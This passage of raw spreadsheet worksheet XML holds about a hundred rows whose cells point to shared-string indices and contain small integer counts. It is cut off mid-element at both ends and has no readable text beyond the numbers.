        <v>16229</v>
      </c>
      <c r="B14195" t="s">
        <v>16219</v>
      </c>
      <c r="C14195">
        <v>0</v>
      </c>
      <c r="D14195">
        <v>1385</v>
      </c>
    </row>
    <row r="14196" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14196" t="s">
        <v>16230</v>
      </c>
      <c r="B14196" t="s">
        <v>16220</v>
      </c>
      <c r="C14196">
        <v>0</v>
      </c>
      <c r="D14196">
        <v>1385</v>
      </c>
    </row>
    <row r="14197" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14197" t="s">
        <v>16229</v>
      </c>
      <c r="B14197" t="s">
        <v>16221</v>
      </c>
      <c r="C14197">
        <v>0</v>
      </c>
      <c r="D14197">
        <v>1385</v>
      </c>
    </row>
    <row r="14198" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14198" t="s">
        <v>16230</v>
      </c>
      <c r="B14198" t="s">
        <v>16222</v>
      </c>
      <c r="C14198">
        <v>0</v>
      </c>
      <c r="D14198">
        <v>1385</v>
      </c>
    </row>
    <row r="14199" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14199" t="s">
        <v>16223</v>
      </c>
      <c r="B14199" t="s">
        <v>16223</v>
      </c>
      <c r="C14199">
        <v>25</v>
      </c>
      <c r="D14199">
        <v>1385</v>
      </c>
    </row>
    <row r="14200" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14200" t="s">
        <v>16224</v>
      </c>
      <c r="B14200" t="s">
        <v>16224</v>
      </c>
      <c r="C14200">
        <v>0</v>
      </c>
      <c r="D14200">
        <v>1385</v>
      </c>
    </row>
    <row r="14201" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14201" t="s">
        <v>16228</v>
      </c>
      <c r="B14201" t="s">
        <v>16211</v>
      </c>
      <c r="C14201">
        <v>0</v>
      </c>
      <c r="D14201">
        <v>50</v>
      </c>
    </row>
    <row r="14202" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14202" t="s">
        <v>16231</v>
      </c>
      <c r="B14202" t="s">
        <v>16212</v>
      </c>
      <c r="C14202">
        <v>0</v>
      </c>
      <c r="D14202">
        <v>50</v>
      </c>
    </row>
    <row r="14203" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14203" t="s">
        <v>16228</v>
      </c>
      <c r="B14203" t="s">
        <v>16213</v>
      </c>
      <c r="C14203">
        <v>0</v>
      </c>
      <c r="D14203">
        <v>50</v>
      </c>
    </row>
    <row r="14204" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14204" t="s">
        <v>16231</v>
      </c>
      <c r="B14204" t="s">
        <v>16214</v>
      </c>
      <c r="C14204">
        <v>0</v>
      </c>
      <c r="D14204">
        <v>50</v>
      </c>
    </row>
    <row r="14205" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14205" t="s">
        <v>16228</v>
      </c>
      <c r="B14205" t="s">
        <v>16215</v>
      </c>
      <c r="C14205">
        <v>3</v>
      </c>
      <c r="D14205">
        <v>50</v>
      </c>
    </row>
    <row r="14206" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14206" t="s">
        <v>16231</v>
      </c>
      <c r="B14206" t="s">
        <v>16216</v>
      </c>
      <c r="C14206">
        <v>3</v>
      </c>
      <c r="D14206">
        <v>50</v>
      </c>
    </row>
    <row r="14207" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14207" t="s">
        <v>16228</v>
      </c>
      <c r="B14207" t="s">
        <v>16217</v>
      </c>
      <c r="C14207">
        <v>0</v>
      </c>
      <c r="D14207">
        <v>50</v>
      </c>
    </row>
    <row r="14208" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14208" t="s">
        <v>16231</v>
      </c>
      <c r="B14208" t="s">
        <v>16218</v>
      </c>
      <c r="C14208">
        <v>0</v>
      </c>
      <c r="D14208">
        <v>50</v>
      </c>
    </row>
    <row r="14209" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14209" t="s">
        <v>16229</v>
      </c>
      <c r="B14209" t="s">
        <v>16219</v>
      </c>
      <c r="C14209">
        <v>0</v>
      </c>
      <c r="D14209">
        <v>50</v>
      </c>
    </row>
    <row r="14210" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14210" t="s">
        <v>16230</v>
      </c>
      <c r="B14210" t="s">
        <v>16220</v>
      </c>
      <c r="C14210">
        <v>0</v>
      </c>
      <c r="D14210">
        <v>50</v>
      </c>
    </row>
    <row r="14211" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14211" t="s">
        <v>16229</v>
      </c>
      <c r="B14211" t="s">
        <v>16221</v>
      </c>
      <c r="C14211">
        <v>0</v>
      </c>
      <c r="D14211">
        <v>50</v>
      </c>
    </row>
    <row r="14212" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14212" t="s">
        <v>16230</v>
      </c>
      <c r="B14212" t="s">
        <v>16222</v>
      </c>
      <c r="C14212">
        <v>0</v>
      </c>
      <c r="D14212">
        <v>50</v>
      </c>
    </row>
    <row r="14213" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14213" t="s">
        <v>16223</v>
      </c>
      <c r="B14213" t="s">
        <v>16223</v>
      </c>
      <c r="C14213">
        <v>25</v>
      </c>
      <c r="D14213">
        <v>50</v>
      </c>
    </row>
    <row r="14214" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14214" t="s">
        <v>16224</v>
      </c>
      <c r="B14214" t="s">
        <v>16224</v>
      </c>
      <c r="C14214">
        <v>1</v>
      </c>
      <c r="D14214">
        <v>50</v>
      </c>
    </row>
    <row r="14215" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14215" t="s">
        <v>16228</v>
      </c>
      <c r="B14215" t="s">
        <v>16211</v>
      </c>
      <c r="C14215">
        <v>0</v>
      </c>
      <c r="D14215">
        <v>5159</v>
      </c>
    </row>
    <row r="14216" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14216" t="s">
        <v>16231</v>
      </c>
      <c r="B14216" t="s">
        <v>16212</v>
      </c>
      <c r="C14216">
        <v>0</v>
      </c>
      <c r="D14216">
        <v>5159</v>
      </c>
    </row>
    <row r="14217" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14217" t="s">
        <v>16228</v>
      </c>
      <c r="B14217" t="s">
        <v>16213</v>
      </c>
      <c r="C14217">
        <v>0</v>
      </c>
      <c r="D14217">
        <v>5159</v>
      </c>
    </row>
    <row r="14218" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14218" t="s">
        <v>16231</v>
      </c>
      <c r="B14218" t="s">
        <v>16214</v>
      </c>
      <c r="C14218">
        <v>0</v>
      </c>
      <c r="D14218">
        <v>5159</v>
      </c>
    </row>
    <row r="14219" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14219" t="s">
        <v>16228</v>
      </c>
      <c r="B14219" t="s">
        <v>16215</v>
      </c>
      <c r="C14219">
        <v>1</v>
      </c>
      <c r="D14219">
        <v>5159</v>
      </c>
    </row>
    <row r="14220" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14220" t="s">
        <v>16231</v>
      </c>
      <c r="B14220" t="s">
        <v>16216</v>
      </c>
      <c r="C14220">
        <v>1</v>
      </c>
      <c r="D14220">
        <v>5159</v>
      </c>
    </row>
    <row r="14221" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14221" t="s">
        <v>16228</v>
      </c>
      <c r="B14221" t="s">
        <v>16217</v>
      </c>
      <c r="C14221">
        <v>0</v>
      </c>
      <c r="D14221">
        <v>5159</v>
      </c>
    </row>
    <row r="14222" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14222" t="s">
        <v>16231</v>
      </c>
      <c r="B14222" t="s">
        <v>16218</v>
      </c>
      <c r="C14222">
        <v>0</v>
      </c>
      <c r="D14222">
        <v>5159</v>
      </c>
    </row>
    <row r="14223" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14223" t="s">
        <v>16229</v>
      </c>
      <c r="B14223" t="s">
        <v>16219</v>
      </c>
      <c r="C14223">
        <v>1</v>
      </c>
      <c r="D14223">
        <v>5159</v>
      </c>
    </row>
    <row r="14224" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14224" t="s">
        <v>16230</v>
      </c>
      <c r="B14224" t="s">
        <v>16220</v>
      </c>
      <c r="C14224">
        <v>0</v>
      </c>
      <c r="D14224">
        <v>5159</v>
      </c>
    </row>
    <row r="14225" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14225" t="s">
        <v>16229</v>
      </c>
      <c r="B14225" t="s">
        <v>16221</v>
      </c>
      <c r="C14225">
        <v>0</v>
      </c>
      <c r="D14225">
        <v>5159</v>
      </c>
    </row>
    <row r="14226" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14226" t="s">
        <v>16230</v>
      </c>
      <c r="B14226" t="s">
        <v>16222</v>
      </c>
      <c r="C14226">
        <v>0</v>
      </c>
      <c r="D14226">
        <v>5159</v>
      </c>
    </row>
    <row r="14227" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14227" t="s">
        <v>16223</v>
      </c>
      <c r="B14227" t="s">
        <v>16223</v>
      </c>
      <c r="C14227">
        <v>20</v>
      </c>
      <c r="D14227">
        <v>5159</v>
      </c>
    </row>
    <row r="14228" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14228" t="s">
        <v>16224</v>
      </c>
      <c r="B14228" t="s">
        <v>16224</v>
      </c>
      <c r="C14228">
        <v>1</v>
      </c>
      <c r="D14228">
        <v>5159</v>
      </c>
    </row>
    <row r="14229" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14229" t="s">
        <v>16228</v>
      </c>
      <c r="B14229" t="s">
        <v>16215</v>
      </c>
      <c r="C14229">
        <v>2</v>
      </c>
      <c r="D14229">
        <v>1275</v>
      </c>
    </row>
    <row r="14230" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14230" t="s">
        <v>16231</v>
      </c>
      <c r="B14230" t="s">
        <v>16216</v>
      </c>
      <c r="C14230">
        <v>2</v>
      </c>
      <c r="D14230">
        <v>1275</v>
      </c>
    </row>
    <row r="14231" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14231" t="s">
        <v>16228</v>
      </c>
      <c r="B14231" t="s">
        <v>16217</v>
      </c>
      <c r="C14231">
        <v>3</v>
      </c>
      <c r="D14231">
        <v>1275</v>
      </c>
    </row>
    <row r="14232" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14232" t="s">
        <v>16230</v>
      </c>
      <c r="B14232" t="s">
        <v>16220</v>
      </c>
      <c r="C14232">
        <v>1</v>
      </c>
      <c r="D14232">
        <v>1275</v>
      </c>
    </row>
    <row r="14233" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14233" t="s">
        <v>16229</v>
      </c>
      <c r="B14233" t="s">
        <v>16221</v>
      </c>
      <c r="C14233">
        <v>10</v>
      </c>
      <c r="D14233">
        <v>1275</v>
      </c>
    </row>
    <row r="14234" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14234" t="s">
        <v>16230</v>
      </c>
      <c r="B14234" t="s">
        <v>16222</v>
      </c>
      <c r="C14234">
        <v>20</v>
      </c>
      <c r="D14234">
        <v>1275</v>
      </c>
    </row>
    <row r="14235" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14235" t="s">
        <v>16230</v>
      </c>
      <c r="B14235" t="s">
        <v>16222</v>
      </c>
      <c r="C14235">
        <v>8</v>
      </c>
      <c r="D14235">
        <v>550</v>
      </c>
    </row>
    <row r="14236" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14236" t="s">
        <v>16224</v>
      </c>
      <c r="B14236" t="s">
        <v>16224</v>
      </c>
      <c r="C14236">
        <v>0</v>
      </c>
      <c r="D14236">
        <v>550</v>
      </c>
    </row>
    <row r="14237" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14237" t="s">
        <v>16228</v>
      </c>
      <c r="B14237" t="s">
        <v>16211</v>
      </c>
      <c r="C14237">
        <v>0</v>
      </c>
      <c r="D14237">
        <v>5191</v>
      </c>
    </row>
    <row r="14238" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14238" t="s">
        <v>16231</v>
      </c>
      <c r="B14238" t="s">
        <v>16212</v>
      </c>
      <c r="C14238">
        <v>7</v>
      </c>
      <c r="D14238">
        <v>5191</v>
      </c>
    </row>
    <row r="14239" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14239" t="s">
        <v>16228</v>
      </c>
      <c r="B14239" t="s">
        <v>16213</v>
      </c>
      <c r="C14239">
        <v>56</v>
      </c>
      <c r="D14239">
        <v>5191</v>
      </c>
    </row>
    <row r="14240" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14240" t="s">
        <v>16231</v>
      </c>
      <c r="B14240" t="s">
        <v>16214</v>
      </c>
      <c r="C14240">
        <v>12</v>
      </c>
      <c r="D14240">
        <v>5191</v>
      </c>
    </row>
    <row r="14241" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14241" t="s">
        <v>16228</v>
      </c>
      <c r="B14241" t="s">
        <v>16215</v>
      </c>
      <c r="C14241">
        <v>0</v>
      </c>
      <c r="D14241">
        <v>5191</v>
      </c>
    </row>
    <row r="14242" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14242" t="s">
        <v>16231</v>
      </c>
      <c r="B14242" t="s">
        <v>16216</v>
      </c>
      <c r="C14242">
        <v>7</v>
      </c>
      <c r="D14242">
        <v>5191</v>
      </c>
    </row>
    <row r="14243" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14243" t="s">
        <v>16228</v>
      </c>
      <c r="B14243" t="s">
        <v>16217</v>
      </c>
      <c r="C14243">
        <v>56</v>
      </c>
      <c r="D14243">
        <v>5191</v>
      </c>
    </row>
    <row r="14244" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14244" t="s">
        <v>16231</v>
      </c>
      <c r="B14244" t="s">
        <v>16218</v>
      </c>
      <c r="C14244">
        <v>12</v>
      </c>
      <c r="D14244">
        <v>5191</v>
      </c>
    </row>
    <row r="14245" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14245" t="s">
        <v>16229</v>
      </c>
      <c r="B14245" t="s">
        <v>16219</v>
      </c>
      <c r="C14245">
        <v>0</v>
      </c>
      <c r="D14245">
        <v>5191</v>
      </c>
    </row>
    <row r="14246" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14246" t="s">
        <v>16230</v>
      </c>
      <c r="B14246" t="s">
        <v>16220</v>
      </c>
      <c r="C14246">
        <v>0</v>
      </c>
      <c r="D14246">
        <v>5191</v>
      </c>
    </row>
    <row r="14247" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14247" t="s">
        <v>16229</v>
      </c>
      <c r="B14247" t="s">
        <v>16221</v>
      </c>
      <c r="C14247">
        <v>0</v>
      </c>
      <c r="D14247">
        <v>5191</v>
      </c>
    </row>
    <row r="14248" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14248" t="s">
        <v>16230</v>
      </c>
      <c r="B14248" t="s">
        <v>16222</v>
      </c>
      <c r="C14248">
        <v>0</v>
      </c>
      <c r="D14248">
        <v>5191</v>
      </c>
    </row>
    <row r="14249" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14249" t="s">
        <v>16223</v>
      </c>
      <c r="B14249" t="s">
        <v>16223</v>
      </c>
      <c r="C14249">
        <v>20</v>
      </c>
      <c r="D14249">
        <v>5191</v>
      </c>
    </row>
    <row r="14250" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14250" t="s">
        <v>16224</v>
      </c>
      <c r="B14250" t="s">
        <v>16224</v>
      </c>
      <c r="C14250">
        <v>1</v>
      </c>
      <c r="D14250">
        <v>5191</v>
      </c>
    </row>
    <row r="14251" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14251" t="s">
        <v>16228</v>
      </c>
      <c r="B14251" t="s">
        <v>16211</v>
      </c>
      <c r="C14251">
        <v>0</v>
      </c>
      <c r="D14251">
        <v>5183</v>
      </c>
    </row>
    <row r="14252" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14252" t="s">
        <v>16231</v>
      </c>
      <c r="B14252" t="s">
        <v>16212</v>
      </c>
      <c r="C14252">
        <v>0</v>
      </c>
      <c r="D14252">
        <v>5183</v>
      </c>
    </row>
    <row r="14253" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14253" t="s">
        <v>16228</v>
      </c>
      <c r="B14253" t="s">
        <v>16213</v>
      </c>
      <c r="C14253">
        <v>0</v>
      </c>
      <c r="D14253">
        <v>5183</v>
      </c>
    </row>
    <row r="14254" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14254" t="s">
        <v>16231</v>
      </c>
      <c r="B14254" t="s">
        <v>16214</v>
      </c>
      <c r="C14254">
        <v>0</v>
      </c>
      <c r="D14254">
        <v>5183</v>
      </c>
    </row>
    <row r="14255" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14255" t="s">
        <v>16228</v>
      </c>
      <c r="B14255" t="s">
        <v>16215</v>
      </c>
      <c r="C14255">
        <v>2</v>
      </c>
      <c r="D14255">
        <v>5183</v>
      </c>
    </row>
    <row r="14256" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14256" t="s">
        <v>16231</v>
      </c>
      <c r="B14256" t="s">
        <v>16216</v>
      </c>
      <c r="C14256">
        <v>0</v>
      </c>
      <c r="D14256">
        <v>5183</v>
      </c>
    </row>
    <row r="14257" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14257" t="s">
        <v>16228</v>
      </c>
      <c r="B14257" t="s">
        <v>16217</v>
      </c>
      <c r="C14257">
        <v>18</v>
      </c>
      <c r="D14257">
        <v>5183</v>
      </c>
    </row>
    <row r="14258" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14258" t="s">
        <v>16231</v>
      </c>
      <c r="B14258" t="s">
        <v>16218</v>
      </c>
      <c r="C14258">
        <v>2</v>
      </c>
      <c r="D14258">
        <v>5183</v>
      </c>
    </row>
    <row r="14259" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14259" t="s">
        <v>16229</v>
      </c>
      <c r="B14259" t="s">
        <v>16219</v>
      </c>
      <c r="C14259">
        <v>0</v>
      </c>
      <c r="D14259">
        <v>5183</v>
      </c>
    </row>
    <row r="14260" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14260" t="s">
        <v>16230</v>
      </c>
      <c r="B14260" t="s">
        <v>16220</v>
      </c>
      <c r="C14260">
        <v>0</v>
      </c>
      <c r="D14260">
        <v>5183</v>
      </c>
    </row>
    <row r="14261" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14261" t="s">
        <v>16229</v>
      </c>
      <c r="B14261" t="s">
        <v>16221</v>
      </c>
      <c r="C14261">
        <v>0</v>
      </c>
      <c r="D14261">
        <v>5183</v>
      </c>
    </row>
    <row r="14262" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14262" t="s">
        <v>16230</v>
      </c>
      <c r="B14262" t="s">
        <v>16222</v>
      </c>
      <c r="C14262">
        <v>0</v>
      </c>
      <c r="D14262">
        <v>5183</v>
      </c>
    </row>
    <row r="14263" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14263" t="s">
        <v>16223</v>
      </c>
      <c r="B14263" t="s">
        <v>16223</v>
      </c>
      <c r="C14263">
        <v>26</v>
      </c>
      <c r="D14263">
        <v>5183</v>
      </c>
    </row>
    <row r="14264" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14264" t="s">
        <v>16224</v>
      </c>
      <c r="B14264" t="s">
        <v>16224</v>
      </c>
      <c r="C14264">
        <v>2</v>
      </c>
      <c r="D14264">
        <v>5183</v>
      </c>
    </row>
    <row r="14265" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14265" t="s">
        <v>16228</v>
      </c>
      <c r="B14265" t="s">
        <v>16211</v>
      </c>
      <c r="C14265">
        <v>2</v>
      </c>
      <c r="D14265">
        <v>1627</v>
      </c>
    </row>
    <row r="14266" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14266" t="s">
        <v>16231</v>
      </c>
      <c r="B14266" t="s">
        <v>16212</v>
      </c>
      <c r="C14266">
        <v>2</v>
      </c>
      <c r="D14266">
        <v>1627</v>
      </c>
    </row>
    <row r="14267" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14267" t="s">
        <v>16228</v>
      </c>
      <c r="B14267" t="s">
        <v>16213</v>
      </c>
      <c r="C14267">
        <v>9</v>
      </c>
      <c r="D14267">
        <v>1627</v>
      </c>
    </row>
    <row r="14268" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14268" t="s">
        <v>16231</v>
      </c>
      <c r="B14268" t="s">
        <v>16214</v>
      </c>
      <c r="C14268">
        <v>9</v>
      </c>
      <c r="D14268">
        <v>1627</v>
      </c>
    </row>
    <row r="14269" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14269" t="s">
        <v>16228</v>
      </c>
      <c r="B14269" t="s">
        <v>16215</v>
      </c>
      <c r="C14269">
        <v>2</v>
      </c>
      <c r="D14269">
        <v>1627</v>
      </c>
    </row>
    <row r="14270" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14270" t="s">
        <v>16231</v>
      </c>
      <c r="B14270" t="s">
        <v>16216</v>
      </c>
      <c r="C14270">
        <v>2</v>
      </c>
      <c r="D14270">
        <v>1627</v>
      </c>
    </row>
    <row r="14271" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14271" t="s">
        <v>16228</v>
      </c>
      <c r="B14271" t="s">
        <v>16217</v>
      </c>
      <c r="C14271">
        <v>9</v>
      </c>
      <c r="D14271">
        <v>1627</v>
      </c>
    </row>
    <row r="14272" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14272" t="s">
        <v>16231</v>
      </c>
      <c r="B14272" t="s">
        <v>16218</v>
      </c>
      <c r="C14272">
        <v>9</v>
      </c>
      <c r="D14272">
        <v>1627</v>
      </c>
    </row>
    <row r="14273" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14273" t="s">
        <v>16229</v>
      </c>
      <c r="B14273" t="s">
        <v>16219</v>
      </c>
      <c r="C14273">
        <v>0</v>
      </c>
      <c r="D14273">
        <v>1627</v>
      </c>
    </row>
    <row r="14274" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14274" t="s">
        <v>16230</v>
      </c>
      <c r="B14274" t="s">
        <v>16220</v>
      </c>
      <c r="C14274">
        <v>0</v>
      </c>
      <c r="D14274">
        <v>1627</v>
      </c>
    </row>
    <row r="14275" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14275" t="s">
        <v>16229</v>
      </c>
      <c r="B14275" t="s">
        <v>16221</v>
      </c>
      <c r="C14275">
        <v>0</v>
      </c>
      <c r="D14275">
        <v>1627</v>
      </c>
    </row>
    <row r="14276" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14276" t="s">
        <v>16230</v>
      </c>
      <c r="B14276" t="s">
        <v>16222</v>
      </c>
      <c r="C14276">
        <v>0</v>
      </c>
      <c r="D14276">
        <v>1627</v>
      </c>
    </row>
    <row r="14277" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14277" t="s">
        <v>16223</v>
      </c>
      <c r="B14277" t="s">
        <v>16223</v>
      </c>
      <c r="C14277">
        <v>26</v>
      </c>
      <c r="D14277">
        <v>1627</v>
      </c>
    </row>
    <row r="14278" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14278" t="s">
        <v>16224</v>
      </c>
      <c r="B14278" t="s">
        <v>16224</v>
      </c>
      <c r="C14278">
        <v>2</v>
      </c>
      <c r="D14278">
        <v>1627</v>
      </c>
    </row>
    <row r="14279" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14279" t="s">
        <v>16228</v>
      </c>
      <c r="B14279" t="s">
        <v>16211</v>
      </c>
      <c r="C14279">
        <v>0</v>
      </c>
      <c r="D14279">
        <v>2217</v>
      </c>
    </row>
    <row r="14280" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14280" t="s">
        <v>16231</v>
      </c>
      <c r="B14280" t="s">
        <v>16212</v>
      </c>
      <c r="C14280">
        <v>0</v>
      </c>
      <c r="D14280">
        <v>2217</v>
      </c>
    </row>
    <row r="14281" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14281" t="s">
        <v>16228</v>
      </c>
      <c r="B14281" t="s">
        <v>16213</v>
      </c>
      <c r="C14281">
        <v>0</v>
      </c>
      <c r="D14281">
        <v>2217</v>
      </c>
    </row>
    <row r="14282" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14282" t="s">
        <v>16231</v>
      </c>
      <c r="B14282" t="s">
        <v>16214</v>
      </c>
      <c r="C14282">
        <v>0</v>
      </c>
      <c r="D14282">
        <v>2217</v>
      </c>
    </row>
    <row r="14283" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14283" t="s">
        <v>16228</v>
      </c>
      <c r="B14283" t="s">
        <v>16215</v>
      </c>
      <c r="C14283">
        <v>1</v>
      </c>
      <c r="D14283">
        <v>2217</v>
      </c>
    </row>
    <row r="14284" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14284" t="s">
        <v>16231</v>
      </c>
      <c r="B14284" t="s">
        <v>16216</v>
      </c>
      <c r="C14284">
        <v>1</v>
      </c>
      <c r="D14284">
        <v>2217</v>
      </c>
    </row>
    <row r="14285" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14285" t="s">
        <v>16228</v>
      </c>
      <c r="B14285" t="s">
        <v>16217</v>
      </c>
      <c r="C14285">
        <v>6</v>
      </c>
      <c r="D14285">
        <v>2217</v>
      </c>
    </row>
    <row r="14286" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14286" t="s">
        <v>16231</v>
      </c>
      <c r="B14286" t="s">
        <v>16218</v>
      </c>
      <c r="C14286">
        <v>0</v>
      </c>
      <c r="D14286">
        <v>2217</v>
      </c>
    </row>
    <row r="14287" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14287" t="s">
        <v>16229</v>
      </c>
      <c r="B14287" t="s">
        <v>16219</v>
      </c>
      <c r="C14287">
        <v>0</v>
      </c>
      <c r="D14287">
        <v>2217</v>
      </c>
    </row>
    <row r="14288" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14288" t="s">
        <v>16230</v>
      </c>
      <c r="B14288" t="s">
        <v>16220</v>
      </c>
      <c r="C14288">
        <v>0</v>
      </c>
      <c r="D14288">
        <v>2217</v>
      </c>
    </row>
    <row r="14289" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14289" t="s">
        <v>16229</v>
      </c>
      <c r="B14289" t="s">
        <v>16221</v>
      </c>
      <c r="C14289">
        <v>0</v>
      </c>
      <c r="D14289">
        <v>2217</v>
      </c>
    </row>
    <row r="14290" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14290" t="s">
        <v>16230</v>
      </c>
      <c r="B14290" t="s">
        <v>16222</v>
      </c>
      <c r="C14290">
        <v>0</v>
      </c>
      <c r="D14290">
        <v>2217</v>
      </c>
    </row>
    <row r="14291" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14291" t="s">
        <v>16223</v>
      </c>
      <c r="B14291" t="s">
        <v>16223</v>
      </c>
      <c r="C14291">
        <v>26</v>
      </c>
      <c r="D14291">
        <v>2217</v>
      </c>
    </row>
    <row r="14292" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14292" t="s">
        <v>16224</v>
      </c>
      <c r="B14292" t="s">
        <v>16224</v>
      </c>
      <c r="C14292">
        <v>1</v>
      </c>
      <c r="D14292">
        <v>2217</v>
      </c>
    </row>
    <row r="14293" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14293" t="s">
        <v>16228</v>
      </c>
      <c r="B14293" t="s">
        <v>16211</v>
      </c>
      <c r="C14293">
        <v>0</v>
      </c>
      <c r="D14293">
        <v>1402</v>
      </c>
    </row>
    <row r="14294" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14294" t="s">
        <v>16231</v>
      </c>
      <c r="B14294" t="s">
        <v>16212</v>
      </c>
      <c r="C14294">
        <v>0</v>
      </c>
      <c r="D14294">
        <v>1402</v>
      </c>
    </row>
    <row r="14295" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14295" t="s">
        <v>16228</v>
      </c>
      <c r="B14295" t="s">
        <v>16213</v>
      </c>
      <c r="C14295">
        <v>0</v>
      </c>
      <c r="D14295">
        <v>1402</v>
      </c>
    </row>
    <row r="14296" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14296" t="s">
        <v>16231</v>
      </c>
      <c r="B14296" t="s">
        <v>16214</v>
      </c>
      <c r="C14296">
        <v>0</v>
      </c>
      <c r="D14296">
        <v>1402</v>
      </c>
    </row>
    <row r="14297" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14297" t="s">
        <v>16228</v>
      </c>
      <c r="B14297" t="s">
        <v>16215</v>
      </c>
      <c r="C14297">
        <v>0</v>
      </c>
      <c r="D14297">
        <v>1402</v>
      </c>
    </row>
    <row r="14298" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14298" t="s">
        <v>16231</v>
      </c>
      <c r="B14298" t="s">
        <v>16216</v>
      </c>
      <c r="C14298">
        <v>1</v>
      </c>
      <c r="D14298">
        <v>1402</v>
      </c>
    </row>
    <row r="14299" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14299" t="s">
        <v>16228</v>
      </c>
      <c r="B14299" t="s">
        <v>16217</v>
      </c>
      <c r="C14299">
        <v>0</v>
      </c>
      <c r="D14299">
        <v>1402</v>
      </c>
    </row>
    <row r="14300" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14300" t="s">
